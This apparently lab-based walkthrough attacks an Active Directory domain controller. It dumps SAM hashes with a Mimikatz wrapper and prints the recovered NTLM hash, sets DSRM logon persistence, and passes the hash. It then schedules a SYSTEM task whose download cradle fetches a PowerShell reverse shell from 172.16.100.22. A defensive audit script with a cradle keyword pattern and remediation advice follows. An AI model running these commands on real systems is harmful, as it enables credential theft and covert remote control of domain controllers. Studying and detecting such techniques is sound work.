
Since we already have access to the DC, let's dump the SAM database with BetterSafetyKatz (a Mimikatz wrapper):
.\BetterSafetyKatz.exe '"token::elevate"' '"lsadump::sam"' "exit"

Nice, we got the local Administrator hash.
The Secrets
[dcorp-dc]: PS C:\Users\svcadmin\documents> .\BetterSafetyKatz.exe '"token::elevate"' '"lsadump::sam"' "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

616     {0;000003e7} 1 D 17861          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01341191} 0 D 20294330    dcorp\Administrator     S-1-5-21-719815819-3726368948-3917688648-500    (12g,26p)       Primary
 * Thread Token  : {0;000003e7} 1 D 20351197    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(commandline) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870

SAMKey : f3a9473cb084668dcf1d7e5f47562659

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: a102ad5753f4c441e3af31c97fad86fd

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz(commandline) # exit
Bye!
Now let's modify the DsrmAdminLogonBehavior registry value so that the DSRM (local) Administrator account is allowed to log on to the DC while it is running normally:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Now let's use BetterSafetyKatz to Pass-the-Hash with the recovered local Administrator hash:
.\BetterSafetyKatz.exe '"sekurlsa::pth /user:Administrator /domain:dcorp-dc /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe"' "exit"

In the new cmd window, open PowerShell, bypass the execution policy, and create a scheduled task on the Domain Controller:
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''http://172.16.100.22/Invoke-PowerShellTcp.ps1''')'"

Now let's run the task:
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
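From the defender's side, both persistence artifacts used above leave durable, easy-to-audit traces on the DC: a DsrmAdminLogonBehavior value under the Lsa key, and a scheduled task running as SYSTEM whose action is a PowerShell download cradle. The following PowerShell audit is an added example (not part of the original write-up or any lab material) that checks for both; it assumes it is run with administrative rights on the Domain Controller, and the cradle keyword list and finding format are my own choices.

```powershell
# Added defensive audit for the two persistence techniques described above.
# Example code, not from the original write-up. Run elevated on the DC
# (or wrap in Invoke-Command to run it against several DCs).

$findings = @()

# --- 1. DsrmAdminLogonBehavior ---
# Absent/0 is the default: the DSRM Administrator may only log on in DSRM mode.
# 1 allows logon when the AD DS service is stopped; 2 allows logon at any time.
$lsaKey = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$dsrm = Get-ItemProperty -Path $lsaKey -Name 'DsrmAdminLogonBehavior' -ErrorAction SilentlyContinue
if ($null -ne $dsrm) {
    $value = $dsrm.DsrmAdminLogonBehavior
    if ($value -in 1, 2) {
        $findings += [pscustomobject]@{
            Check    = 'DsrmAdminLogonBehavior'
            Detail   = "Value is $value (default is not set); DSRM Administrator can log on outside DSRM mode"
            Severity = 'High'
        }
    }
}

# --- 2. Scheduled tasks running as SYSTEM that launch a PowerShell download cradle ---
# Keyword list is an assumption chosen for this example; tune it to your environment.
$cradlePattern = 'DownloadString|DownloadFile|IEX|Invoke-Expression|-enc|FromBase64String'
Get-ScheduledTask | ForEach-Object {
    $task  = $_
    $runAs = $task.Principal.UserId
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($runAs -match 'SYSTEM' -and $cmd -match 'powershell' -and $cmd -match $cradlePattern) {
            $findings += [pscustomobject]@{
                Check    = "ScheduledTask:$($task.TaskName)"
                Detail   = "Runs as $runAs with command: $cmd"
                Severity = 'High'
            }
        }
    }
}

if ($findings.Count -eq 0) {
    'No DSRM or scheduled-task persistence indicators found.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

A hit on the first check is remediated by deleting the value (Remove-ItemProperty on the same key and name) and rotating the DSRM password with ntdsutil; a hit on the second by Unregister-ScheduledTask after the task XML has been preserved for the investigation. Enabling object access auditing on the Lsa key surfaces the write itself as Event ID 4657 (a registry value was modified), and Event ID 4698 records scheduled task creation, so both can be alerted on as they happen rather than found after the fact.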

Now let’s go back to our listener